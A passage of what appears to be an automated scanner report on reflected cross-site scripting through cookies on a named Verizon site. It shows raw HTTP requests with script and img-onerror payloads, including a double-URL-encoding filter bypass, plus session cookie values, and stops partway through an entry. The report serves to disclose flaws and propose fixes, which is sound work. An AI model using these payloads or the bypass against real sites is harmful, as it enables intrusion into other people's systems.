GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX202c8<script>alert(1)</script>a033bcd02b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73632
Expires: Sat, 20 Nov 2010 00:11:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX202c8<script>alert(1)</script>a033bcd02b5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX202C8<SCRIPT>ALERT(1)</SCRIPT>A033BCD02B5 </DIV>
...[SNIP]...

3.251. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8020'><script>alert(1)</script>7e15a2d3a4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc8020'><script>alert(1)</script>7e15a2d3a4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112507
Expires: Sat, 20 Nov 2010 00:15:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXc8020'><script>alert(1)</script>7e15a2d3a4; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC8020'><SCRIPT>ALERT(1)</SCRIPT>7E15A2D3A4 ' />
...[SNIP]...

3.252. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4afcd<script>alert(1)</script>f5636ef73be was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4afcd<script>alert(1)</script>f5636ef73be; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 00:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX4afcd<script>alert(1)</script>f5636ef73be; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4AFCD<SCRIPT>ALERT(1)</SCRIPT>F5636EF73BE </DIV>
...[SNIP]...

3.253. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e9210<script>alert(1)</script>17637724fdd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe9210<script>alert(1)</script>17637724fdd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 00:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=TXe9210<script>alert(1)</script>17637724fdd; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE9210<SCRIPT>ALERT(1)</SCRIPT>17637724FDD </DIV>
...[SNIP]...

3.254. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e8e6'><script>alert(1)</script>b8d520065ab was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e8e6'><script>alert(1)</script>b8d520065ab; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110967
Expires: Sat, 20 Nov 2010 00:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX4e8e6'><script>alert(1)</script>b8d520065ab; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4E8E6'><SCRIPT>ALERT(1)</SCRIPT>B8D520065AB ' />
...[SNIP]...

3.255. http://www22.verizon.com/residential/internet [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/internet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6913f<script>alert(1)</script>c0ed5cd13fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6913f<script>alert(1)</script>c0ed5cd13fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73111
Expires: Sat, 20 Nov 2010 00:16:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6913f<script>alert(1)</script>c0ed5cd13fb; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6913F<SCRIPT>ALERT(1)</SCRIPT>C0ED5CD13FB </DIV>
...[SNIP]...

3.256. http://www22.verizon.com/residential/internet [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/internet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf607'><script>alert(1)</script>af83f93894c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXbf607'><script>alert(1)</script>af83f93894c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73115
Expires: Sat, 20 Nov 2010 00:16:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbf607'><script>alert(1)</script>af83f93894c; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBF607'><SCRIPT>ALERT(1)</SCRIPT>AF83F93894C ' />
...[SNIP]...

3.257. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/specialoffers/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f was submitted in the vzapps cookie. This input was echoed as 4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /residential/specialoffers/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 20 Nov 2010 00:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDQQCTSBDQ=IGIKCPNBAEMHJEFBAIDLEPPI; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 126538

<!-- Vignette V6 Fri Nov 19 16:15:44 2010 -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

<!-- mp_trans_remove_start -->
<title>Verizon | Residential Specia
...[SNIP]...
<script type="text/javascript" src="/residential/specialoffers/zipcheck?st=TX4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f">
...[SNIP]...

3.258. http://www22.verizon.com/residentialhelp [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4fea9<script>alert(1)</script>38ddcfffc57 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4fea9<script>alert(1)</script>38ddcfffc57; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:53 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:53 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4fea9<script>alert(1)</script>38ddcfffc57</span>
...[SNIP]...

3.259. http://www22.verizon.com/residentialhelp [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload bbbc1<script>alert(1)</script>763928accef was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXbbbc1<script>alert(1)</script>763928accef; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:52 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:52 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXbbbc1<script>alert(1)</script>763928accef </span>
...[SNIP]...

3.260. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/

Issue detail

